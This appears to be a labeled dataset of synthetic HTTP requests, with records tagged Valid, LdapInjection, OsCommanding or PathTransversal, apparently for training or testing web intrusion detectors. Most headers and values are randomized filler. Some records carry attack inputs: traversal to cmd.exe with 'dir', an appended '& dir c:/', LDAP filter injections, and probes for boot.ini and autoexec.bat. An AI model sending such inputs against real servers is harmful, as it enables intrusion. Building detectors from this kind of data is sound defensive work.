----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 10093
Start - Id: 5460
class: Valid
PUT /ddicah.swf? HTTP/1.0
Content-Length: 103
Content-Language: sbitt,wl2e,xe
Content-Encoding: compress
Content-Location: /tapCs/cehicn/wxtoa5i/Atxirad.asp
Content-MD5: bG9lbW5yY250Z0hMNnB0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Jan 05 04:10:55 UTC
Last-Modified: Sun, 20 Apr 08 19:47:54 CET
Host: 241.254.3.134:081
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce;q=0.4, iso-2022-kr;q=0.0, iso-8859-4, utf-8, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 45.222.201.177
Cookie: K6bNeor-vNF=cT@bZ
Cookie2: $Version="55"
Date: Sun, 29 Jan 06 09:36:40 CET
ETag: "5DxH4NUkctaWASH"
Expect: 100-continue
From: seeYcrmn@lLtnoeFTi5.org
If-Modified-Since: Tue, 07 Oct 08 16:56:24 UTC
If-Unmodified-Since: Thu, 08 Feb 07 06:40:45 CET
If-Match: "c5B7d_zE8QztVI6S"
If-None-Match: *
If-Range: Fri, 07 Nov 08 02:07:42 GMT
Max-Forwards: 5
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest response="d2FB16AdF8542191FCf959b23cfAeb86"
Authorization: Digest username="ou7zie"
Range: 25867-
Referer: http://www.ffatn.cz/1Cea/lkhokt.cfm
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.4 (Windows; U; WinNT 8.2; ap-a5; rv:8.1.3) Gecko/02051923
UA-CPU: PowerPC
UA-Disp: 7113,056,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1579x1357
Via: ibl/2.6 www.yuebX.jpg, FTP/1.5 245.103.194.186, 6.9 www.eqor.tiff:7
Transfer-Encoding: e6tI; hlw7gefm=au2ye
Upgrade: k9i/1.1, mnmtv/1.4, tiyr/9.0, tsr/3.1
Warning: 198 www.earWees.jpg "iai98tpeegtl0r" "Sat, 12 Aug 06 14:50:22 CET"
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 757852
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

roOii=OtgW~niiech-&n28nenfRkee=\ayopenh&atmddidic=aieim&Ddot=29085&ra=node&meke1rradoi=59c6Ve-8dR7g

End - Id: 5460
Start - Id: 38565
class: LdapInjection
GET /ysWtrsmxt5owrrE/2lU--pEBKqwRP/m658jouWQXj/dHySOu8ChQy/peemz/nYvar/nclogzWradmincvCBPAl7U/lZ4u@S/anoan0hneX2ha2oo/7pnecebdnsmeCa/ikKp0orfY1ofhSPOXa.jpeg?vWeYntEobo=Oei&tonla0h8zuaiebK=xiw%29%28++%7C+++%28nrre%3D*%29&eduid0ngaEue8ia=xd&homeLF@rmAEyTnpN=ja&akiiSmf=pc&ya5Ils9twi=lpjO&so2Trhllr6=iY&lhexeaswunt=ykwcoak0fE&A6xZacceptzrYE@linkwhere=rmacat&6Xt9whh=444637769&qhn5uqes0e2g=mLjFxImDROM_&3le2rFttidds9=elike&ntpiuzbbc=-titnopute%28+&R4kNHnA=h1mdvarhl3r9&rAa0oA56=anXf HTTP/1.0
Host: 90.165.64.21
Connection: itxewd
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesesimp;q=0.5, x-mac-korean;q=0.1, iso-8859-8-i;q=0.0, koi8;q=0.6, x-mac-korean;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 164.121.66.240
Cookie: md=r0oo;meEI=83070;iacvemaneet9Amc=nmeb9openexecllhug mar
Cookie2: $Version="55"
Date: Thu, 07 Jul 05 17:55:43 GMT
ETag: "yvLqbLU3KSVEEAqM"
Expect: 100-continue
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Mon, 25 Apr 05 12:34:53 GMT
If-Unmodified-Since: Tue, 02 Nov 04 20:39:11 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 131
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic bGVhY286c3RvcnNz
Authorization: Basic c05laWdkaDpyZWRl
Range: -5
Referer: /Eodaj/roHay/ssAvFtes.tar
TE: trailers,chunked
Trailer: Accept
User-Agent: ncseR/8.7.6
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6483x132
Via: HTTP/5.6 10.4.241.62:21364, 9.3 www.Tseoi.css, 5.6 184.65.95.36
Transfer-Encoding: gzip
Upgrade: iintzo/8.2
Warning: 605 www.aElte.jpg "smttlahhNbrou8r" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38565
Start - Id: 10603
class: Valid
GET /itsbabTei/tustThftRdsit/eGrqPdwpkx/5.WCJ/ibywv_YdiH/t4SQ2hW4mBD/eohawco9mer/2ee/ekure8glonsjrHE/AncNHGwYil_peo/acLjfT2k.js? HTTP/1.1
Host: www.bBMetel.uk
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.3, big5;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: e=din
Client-ip: 70.48.78.78
Cookie: oreorCctsht=teGr
Cookie2: $Version="07"
Date: Sun, 18 May 08 14:12:57 GMT
ETag: W/"m8setTt.CEOTvQMHTtS_"
Expect: 100-continue
From: urh4ame@uIj4a1nz.ch
If-Modified-Since: Tue, 19 Jan 10 11:21:27 UTC
If-Unmodified-Since: Sun, 05 Jun 05 12:06:29 UTC
If-Match: "XScgx5pukPsdty5sPFP"
If-None-Match: "D2_Ot_JBPtNwC_bOo"
If-Range: Thu, 14 Jan 10 02:16:01 GMT
Max-Forwards: 4853
MIME-Version: 5.8
Pragma: Faaf='xs'
Proxy-Authorization: NTLM YUdyVGlhaDVsYmVoMGQ4Z09oMWVhaDdlMXdhZWl5dDNsZXo5OHlz
Authorization: NTLM NG5yYW50SDZuQWVvbG5uY25xTmhzYTJOYmhTZ25iZHZvU2RucDRsdQ==
Range: -8,-00,5230-
Referer: http://www.9tsi.uk/rochaise/aeh2on.pl
TE: deflate,trailers
Trailer: If-Range
User-Agent: 3et9gtt/8.3
UA-CPU: Sparc
UA-Disp: 4542,2926,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 170x2008
Via: 6.6 7.55.14.80:5, 7.6 www.lEnsewbh.jpg, hwssUs/2.3 www.A8nd.html
Transfer-Encoding: identity
Upgrade: telnx/9.9, iusnr/3.5
Warning: 218 www.nhleO.tiff "hftsrinltachxeZT" "Sun, 23 Aug 09 20:06:19 GMT"
X-Forwarded-For: 93.154.42.186
X-Serial-Number: 719045121636524930
----: -------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 10603
Start - Id: 19010
class: Valid
GET /ioaeianeearecnd/AsUrrh0ei3iTinr/yrNqYYdXsM/s3BHgQFqUba.n/t965kDMff/passthruF_m/c0A-FVN/elFouNi.fPI.asmx?thtratoecn=u9_Ya&.Ve1linkqK5P=Dceeaabemswtsb HTTP/1.1
Host: 107.140.194.73:084
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: 1fnTp-vk, oa-t2rbuncq, nN-zQ;q=0.8
Cache-Control: only-if-cached
Client-ip: 227.16.86.109
Cookie: WhXU.W@S=kSeix bjuonsb
Cookie2: $Version="62"
Date: Thu, 14 Oct 04 03:50:19 CET
ETag: "IMbWEbakEw-2RJJ@shp"
Expect: 8ee5fjqi=chyktiir;0ineeln
From: teiyc@nuhni81dA.fr
If-Modified-Since: Fri, 02 Apr 04 09:00:05 GMT
If-Unmodified-Since: Wed, 25 Nov 09 17:36:24 GMT
If-Match: "NC@-1n6x_am8ZVpSuab"
If-None-Match: *
If-Range: *
Max-Forwards: 827
MIME-Version: 8.1
Pragma: nEX='6kiFL'
Proxy-Authorization: Basic dDFzaGRzaXU6c2VkaUllMg==
Authorization: Digest username="ie0lxv"
Range: -00,5-,-68
Referer: http://www.rd8ns.org/utytrpg.mdb
TE: trailers,trailers,gzip;q=0.6
Trailer: User-Agent
User-Agent: eWn.GG.O http://www.ic6apo.be
UA-CPU: 68000
UA-Disp: 017,5137,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 890x6831
Via: FTP/9.5 www.hdeehnl.png, 85nx/0.1 163.191.8.121:34498
Transfer-Encoding: compress
Upgrade: tsnbwM/6.3, tlua8/1.6
Warning: 097 131.235.92.163:74694 "1HrdrfsFeisainaJx" "Tue, 01 May 07 01:17:00 CET"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19010
Start - Id: 20142
class: Valid
GET /YyA2-xGRyS/oXuTKKG@4/awlnkctk/acttstuJi/O1yt3bTraesouds/EuEet43qdae0tds/9@rTfjsock_streamw-m_samd/ianjiesxuiIOna.html?wafctz=tltRdipod&hedojT2ya=9518&DPDm=030807&ratybncc=%25%7CSOi45N%5D&mar=kmesahsmd HTTP/1.0
Host: 16.61.156.94
Connection: 62hoddvs
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 112.70.151.93
Cookie: aeooemlaoti=s
Cookie2: $Version="2"
Date: Thu, 09 Dec 04 07:32:26 GMT
ETag: "UEDIWMBQIfD4d18"
Expect: lsdoo
From: np1ebr9@yntet.it
If-Modified-Since: Wed, 10 Sep 08 22:28:43 UTC
If-Unmodified-Since: Sun, 01 Feb 04 13:22:46 GMT
If-Match: *
If-None-Match: "TY0yLK1UxEUvRWY"
If-Range: "ff0LrsfM6NNSz9fTAfc"
Max-Forwards: 196
MIME-Version: 1.8
Pragma: ol3Qan='raa'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest username="aodtd"
Range: 48910-875971,804755-62
Referer: http://RaTlr.ch/tqc3/6Yfti/rorgwa/telo/ooqs.wav
TE: trailers,deflate
Trailer: Date
User-Agent: Mozilla/1.5 (Windows; U; WinNT 8.8; oy-tt; rv:6.9.2) Gecko/49879539
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2245x9664
Via: 0.1 188.107.100.225, 4.8 www.terhtes.html, oone/4.6 www.Ipee.shtml
Transfer-Encoding: compress
Upgrade: gsxSw/8.7, hxstE4/2.5, thn/2.2, tad/9.4, rii/8.9
Warning: 998 www.ttRcoh91.jpeg "bE5Jru" 
X-Forwarded-For: 147.125.181.72
X-Serial-Number: 01250528765
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20142
Start - Id: 43836
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.flaohr.ch:80
Connection: erprO
Accept: image/*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=02
Client-ip: 253.23.39.70
Cookie: o3nra=H'o>%us5dakth
Cookie2: $Version="61"
Date: Sun, 11 Sep 05 18:14:14 GMT
ETag: "zQHzJlf7BIhHrxg"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 05 Sep 05 03:28:20 CET
If-Unmodified-Since: Mon, 10 Oct 05 02:19:34 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: "EL8dZILjk3JALA.lmp"
If-Range: "JJLnz_Jj8MknVuRPq"
Max-Forwards: 1
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM d3JhcnppaGF6bWlFYm5pUG9zZHQ0bGRFczBlc2g5b2NldW8w
Range: 653-,494-99921,2-094773
Referer: http://www.ca8ge.biz/naelm0ki/eci1p/eu7e/dorntna.rar
TE: trailers,trailers
Trailer: Accept
User-Agent: etnucpyean (h-Qb.lD)
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6925x167
Via: n5chnh/5.3 www.edycuzEd.shtml
Transfer-Encoding: eoshG
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43836
Start - Id: 4001
class: Valid
POST /2esIrmh/O0MB/hKWvW@6rG_NtdwnCs9t/_FkNhYq.bin? HTTP/1.0
Content-Length: 155
Content-Language: ypeerjiO,TsSdeti,er7
Content-Encoding: compress
Content-Location: http://www.thve.com/bevs84t4.aspx
Content-MD5: VGlnaXBhdHQ5dG5pYmZsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Mar 06 04:50:04 GMT
Last-Modified: Sat, 21 May 05 03:28:25 CET
Host: 124.87.128.6:880
Connection: close
Accept: application/*;q=0.0, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nm-egOz;q=0.6, sKhee-d, nbauad-wOnxr;q=0.9
Cache-Control: max-stale=7030
Client-ip: 112.108.51.145
Cookie: ryRerheepwbeje=403;nsua=uoQ4PFA;kXwD=abGfL-hLSV2;kstdinAikjEj=r8FLP0;wFXFuhPik=964
Cookie2: $Version="822"
Date: Fri, 04 Aug 06 06:18:04 UTC
ETag: "sY36fokoNZ@qnTXU1"
Expect: 100-continue
From: shrd67t@nesPar.biz
If-Modified-Since: Mon, 08 Mar 04 13:57:42 UTC
If-Unmodified-Since: Tue, 17 Apr 07 20:13:03 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 12 Oct 04 20:46:01 GMT
Max-Forwards: 506
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: Digest response="7abC1bF906d7Cd663A940E2FDC6F2f0F"
Range: -097697,13-,-7
Referer: http://www.D8sqfu.ch/s0rl.png
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.4 (Windows; U; Win98 4.1; 0e-3O; rv:6.5.0) Gecko/45897861
UA-CPU: Sparc
UA-Disp: 055,684,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 242x137
Via: 2.4 www.g3fzp1v.shtml
Transfer-Encoding: pynE; gynh=hWue4
Upgrade: oefTul/8.6, 0Euin/6.0, n5h/9.8, ghe/7.4, n3n48/3.1
Warning: 442 www.azjbyn.gif "uhemezissofcc" "Sun, 09 Sep 07 08:19:07 GMT"
X-Forwarded-For: 189.95.227.203
X-Serial-Number: 4557721
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

bmewxo=ln>Higotqsniframem1eautev&pmc=367&suJaai=nt&AXzQ=25&npr3uva=dZvszl7tW9&iutp3lelnAzo=sgeomt s&abfncrlehasn4=sZGgue&ee2oEaas9tgnI=e_Vq&oeog=coycathb

End - Id: 4001
Start - Id: 44219
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.n3ifs.com:05
Connection: keep-alive
Accept: image/*, audio/x-wav;q=0.8, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=9009
Client-ip: 104.52.228.119
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="572"
Date: Wed, 17 Jan 07 17:59:17 UTC
ETag: "@p2buksFXGXLgt8"
Expect: et2ess1=aa0davZ;sinntl
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sat, 23 Aug 08 05:22:59 CET
If-Unmodified-Since: Tue, 27 Apr 04 11:13:00 UTC
If-Match: *
If-None-Match: "1eKg6KWq0SZ8_WZPbi75"
If-Range: Thu, 30 Oct 08 13:59:14 UTC
Max-Forwards: 6119
MIME-Version: 1.8
Pragma: leqmtnr='Enyn'
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: NTLM TW90b2V6UGVzbzRlbjR0a2xnamluZWJlaWVpeXNwNWFnZWlkcw==
Range: 09660-850419
Referer: http://Ttarnit.be/7tG2wM2/eimbss/raoOwie.pl
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 2.0; tb-sh; rv:2.9.7) Gecko/76412427
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x848
Via: 8.1 198.77.239.197
Transfer-Encoding: gzip
Upgrade: eeiw/8.3, Tc4cy/9.9, ciigE/9.1
Warning: 268 161.222.182.214 "sxsom" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44219
Start - Id: 27235
class: Valid
GET /eissceo/N41exec.zwformBlcevalPWi/oclm0.1tm-tJtHp3g/mmyec6tattQe/3c9.fOfUF1allQ-/bo2gdeharwqllutd/iTaF6dAQ8EV/zw.G8Dz/0.1i2/pezork6lfdebm2err.bin?eM=onit&ttts3R4amTr5c=76&TeHbnm7lpeivr=627978 HTTP/1.1
Host: www.eetvt.com
Connection: keep-alive
Accept: video/*;q=0.1, image/*;q=0.3, text/*;q=0.0
Accept-Charset: windows-874, x-mac-korean;q=0.4, x-mac-roman;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=61127
Client-ip: 220.207.38.104
Cookie: 7nscOfiworenlL=5urmrnn ct;htzk=c;eewZ6beaEoe=3219;iepOs=o0aheo4cgelsW7h;Tf2DTvR1ZEQQ=noce+8rew;eeOUamr1=87060
Cookie2: $Version="04"
Date: Fri, 05 Dec 08 13:06:17 CET
ETag: W/"twEs.HLlIF3vy.l4"
Expect: 100-continue
From: el3tal@tATotto.st
If-Modified-Since: Mon, 07 May 07 24:59:11 UTC
If-Unmodified-Since: Sun, 13 Jun 04 21:45:59 GMT
If-Match: *
If-None-Match: "akZvTUlf2B1X-D_Ze"
If-Range: *
Max-Forwards: 5906
MIME-Version: 6.9
Pragma: bf='nezsz'
Proxy-Authorization: Digest realm
Authorization: NTLM c29XcG9jbnAwbHR1ZXhlRmVvb2FvcWJoc3lhczhvdHBzY3N1c3I4bW9udA==
Range: 075-196
Referer: /qiye/est0u/iytnxo.mpeg
TE: trailers
Trailer: If-Match
User-Agent: nifwulsae/1.2.5.7.0
UA-CPU: 68000
UA-Disp: 4043,642,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 779x7656
Via: 0.4 www.geah.tiff, fdni/5.2 84.248.117.72:2, FTP/5.7 www.lgts.gif
Transfer-Encoding: compress
Upgrade: nnr3no/2.4, ssa6/6.6, nrmmhe/0.5, dTflr/9.1
Warning: 912 www.tlsceet.jpg "htt0txe6ditepgelehe" 
X-Forwarded-For: 59.58.186.111
X-Serial-Number: 907247306873
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27235
Start - Id: 43835
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.3hfeor.biz
Connection: close
Accept: */*;q=0.4
Accept-Charset: big5
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: max-age=02
Client-ip: 157.173.160.168
Cookie: o3nra=H'o>%us5dakth
Cookie2: $Version="61"
Date: Sat, 25 Oct 08 12:31:48 GMT
ETag: "zQHzJlf7BIhHrxg"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 07 Jul 09 04:27:31 CET
If-Unmodified-Since: Mon, 10 Oct 05 02:19:34 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: "EL8dZILjk3JALA.lmp"
If-Range: "JJLnz_Jj8MknVuRPq"
Max-Forwards: 4
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM d3JhcnppaGF6bWlFYm5pUG9zZHQ0bGRFczBlc2g5b2NldW8w
Range: 653-,494-99921,2-094773
Referer: http://www.e1sfr.biz/dspsnule/ep14ts56.pdf
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/4.9 (X11; U; SunOS sun4u 3.7; lo-4e; rv:4.4.3) Gecko/26676885
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6925x167
Via: n5chnh/5.3 www.edycuzEd.shtml
Transfer-Encoding: eoshG
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43835
Start - Id: 17875
class: Valid
GET /an/vR0m/Hd3.p3/ye5akbh/t-E/hEceleNaempidsjtcSLm/Gf/gcWB8Rmocha/dU4dv1bTv5e.FT.bin?8suiln0sFd=form8naamsaOlh8&8PEOtsrendkje7=uuisIlpus&oteh6=i+rg&oaeUyi=6&4YU4V=136&oe5h6=t%40tZFz_BB1u6&pssn=jhigzotddn HTTP/1.0
Host: www.ov6eTeq87T.be
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312;q=0.1, iso-8859-4, x-mac-cyrillic, gb2312
Accept-Encoding: *
Accept-Language: *
Cache-Control: o2aco=yyvtNS
Client-ip: 78.14.160.119
Cookie: 8B2pQS9=thlui;maslzhaoic=430352;w3osm6snmdheOK=62989;sUiariicen2f=iscaoka0nullrma;2is9=yr%;uiu=2853668
Cookie2: $Version="47"
Date: Thu, 29 Sep 05 22:19:25 GMT
ETag: "uXPXcexxgKdrDYnufxs"
Expect: anaiO
From: miaitpt@oswKea.net
If-Modified-Since: Thu, 08 Feb 07 20:23:56 GMT
If-Unmodified-Since: Wed, 11 Jan 06 21:06:49 UTC
If-Match: "lPt2Jl6TJ2k48i7XPJ"
If-None-Match: *
If-Range: Sun, 03 Dec 06 03:09:01 UTC
Max-Forwards: 0656
MIME-Version: 8.8
Pragma: eaOdheec='ml'
Proxy-Authorization: NTLM aWd1bXRkZWR2eW5hc3ptdG5odHVaUmhoczJBbGR0ZGxF
Authorization: Basic OXlzMGRjOmFuYW9laWU=
Range: 0553-412,892-528226
Referer: /shqcp/0utnt1sr/3eat.pdf
TE: deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: Mozilla/0.9 (compatible; MSIE 4.6; Mac OS X; tetyLmiUe; ho0aCE)
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8176x316
Via: tme/6.0 www.AAmysieh.shtml, HTTP/2.5 98.128.199.64, nrx/2.6 51.192.192.211
Transfer-Encoding: oMc45t
Upgrade: stQa7u/4.6, e3t4e/1.7, los0Y/9.6, le6ear/5.3, irt/9.2
Warning: 182 45.71.47.57 "htrzocTenleelhEw" "Wed, 18 Oct 06 09:52:04 GMT"
X-Forwarded-For: 223.60.103.146
X-Serial-Number: 3494344
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17875
Start - Id: 5634
class: Valid
POST /d0ZEk6wi0/5xAJSallRyVl5documentWV/h06hSC/ad6xSTQ2Mt5-mofI_f/rq/pqD3KkADGB1jxeYTJXjX/aeMvMn0xn/eOaBAotututoe/cii5nn68O9/dvGvVKtjo1txLGmUb.b/7orvnehtcweao.asmx? HTTP/1.1
Content-Length: 204
Content-Language: slafjsc,ar,s
Content-Encoding: gzip
Content-Location: /exclli/Ld5h2/xeyr4x6/TiE6n.conf
Content-MD5: c3RlNmsyTW5saWhpMmRseQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Oct 08 18:07:27 CET
Last-Modified: Tue, 01 Jan 08 02:17:47 GMT
Host: 181.253.249.38
Connection: s8e4ta
Accept: video/mpeg, application/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.5
Accept-Language: dtl-2exR1;q=0.9, t7es6le-ohsm, yln-edcretvs;q=0.0, ne-ouosc
Cache-Control: max-stale=2494
Client-ip: 248.232.138.60
Cookie: Eft5a3hrpnmas=(6tiw;asm=aPmho;slht67Ha9a1i=491066;3c6pwuIyiSwNsaf=ewoaoihjn&shutdownAoiformekinsertnf
Cookie2: $Version="2"
Date: Sat, 04 Sep 04 04:27:40 UTC
ETag: W/"A@Vd0v.fX81gSRwE"
Expect: 100-continue
From: noeLofs5@rseiiaono.biz
If-Modified-Since: Tue, 15 Jul 08 22:38:21 UTC
If-Unmodified-Since: Sun, 18 Jul 04 16:38:26 GMT
If-Match: *
If-None-Match: "qm.JUqc76w5U0C8"
If-Range: "2_lyruh._wWx4WIcYqJ"
Max-Forwards: 1078
MIME-Version: 9.8
Pragma: tyfrh='sh'
Proxy-Authorization: eoaot ubahyefg=7a5iI
Authorization: Digest response="6f23F94f7a0dCC76dedEBD248f54Dc8e"
Range: 2276-60,56286-,36-07002
Referer: http://www.tvRzeo.net/nritxet/eiqeIty/tdete/teasu.exe
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Modified-Since
User-Agent: aWz2IamVD http://www.absoSss.st
UA-CPU: x86
UA-Disp: 6817,0716,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 768x653
Via: 8.2 201.158.0.51
Transfer-Encoding: compress
Upgrade: han/8.7, 10s/1.0, cttH8e/9.6, tmdb/9.7, qlteR/5.3
Warning: 369 73.254.252.135 "st2nea" "Wed, 08 Nov 06 03:43:52 GMT"
X-Forwarded-For: 43.162.121.32
X-Serial-Number: 61444229813363
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

9hLotsnedm=2t4it&rneu4hnhmtos=74068475&h1ndrfocferp0=8185&i9EoOf=mp2&Ret=39&nhpaUdeo=grsiyic6ixw15e&5TzmmFfhl=d)sqnavt@UqkoHsm6lg&Tr=ciwhereieae&eOgtnmdehsIos=n cOUot7&vadminhPfRKt9gII=aoee&mXEB=75288

End - Id: 5634
Start - Id: 45334
class: PathTransversal
GET /V4uc0lc/ub/It7y3oehereysevh/aPp3i/tnv/onaosw/1UCiJlwA/mmxE3/S5M55EP/XFS/Fl-VFrdOxcatconnectEp/insert0-Je.swf?jw6MlMQ=oWuXfTTEO-&nsje7sien=perus&iframehomeDzge=uos&ecc1z=%25%3Adne&62l5=osuHmeneaedrtrc&elaeeydjeefti6l=tene5hld7mlxa&lurc=5901673&ms7imiaYin=E%275t%3D+g%40c-+boot.ini&Ai=iweeeiuo%26e&fhnxatevdmEUsb=rzl+ HTTP/1.1
Host: 238.57.247.234:8475
Connection: s47t
Accept: audio/*;q=0.4
Accept-Charset: utf-8;q=0.1, iso-8859-7;q=0.6, us-ascii;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: lusaey0-Wteeh, leaetx-trrsfki, 9-ADr, nkato-rismlstt;q=0.8, sne-n;q=0.2
Cache-Control: eeheg4rt='nneiso7'
Client-ip: 189.40.197.6
Cookie: gtia7ef8Amd=c:\autoexec.bat
Cookie2: $Version="785"
Date: Thu, 18 Mar 04 17:43:06 UTC
ETag: W/"T5y_RkZsNDzg_Vcw"
Expect: 100-continue
From: ahegzhc@iatbU1r.com
If-Modified-Since: Sat, 29 Nov 08 17:25:24 UTC
If-Unmodified-Since: Sun, 06 May 07 24:31:46 GMT
If-Match: "l57XNkbcCf0Z2zr"
If-None-Match: *
If-Range: Thu, 22 Apr 04 19:11:33 CET
Max-Forwards: 0
MIME-Version: 9.9
Pragma: n8gja='Tro'
Proxy-Authorization: NTLM bW5tb2xhbGJjdWxtdGVlZXRpY2hvdHlhcmV1YVRyRTJjdw==
Authorization: Basic c29hdzpPZm10NA==
Range: 73-4
Referer: http://6uhfl9N.ch/o2sikn/Tiytihry.swf
TE: trailers
Trailer: Upgrade
User-Agent: eU-hdLQ3K http://www.sfooe.fr
UA-Disp: 9994,3331,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6223x116
Via: 2.1 www.scranoU.jpg, FTP/4.1 214.189.184.196, FTP/8.5 www.wtytydTe.shtml:73757
Transfer-Encoding: p0gn
Upgrade: ainrp/4.8, hs1re/2.0, ifi/1.8, s1pf8u/8.1
Warning: 703 www.tnyrt.gif:15 "hIleme" "Tue, 25 Jul 06 09:33:09 GMT"
X-Forwarded-For: 119.160.27.173
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 45334
Start - Id: 38950
class: LdapInjection
GET /ejs-gOSf4Dws9/8_e--SaM9ncgUld5/os96Be/setlbee/vFock.T5d8.asp?a2f=ktnwep5&vkoH2ciH34antse=eg%29%28+++%7C++++%28hE%3D*%29&tequyIn=ioez_Te HTTP/1.1
Host: www.aplbt.de
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.8
Accept-Encoding: compress, gzip, identity, identity, compress
Accept-Language: tnoh-raatugsx;q=0.4, cmealCTe-na, H-8iEirse, s1t-Al;q=0.7, shtdeiu6-weA
Cache-Control: max-stale
Client-ip: 69.146.201.136
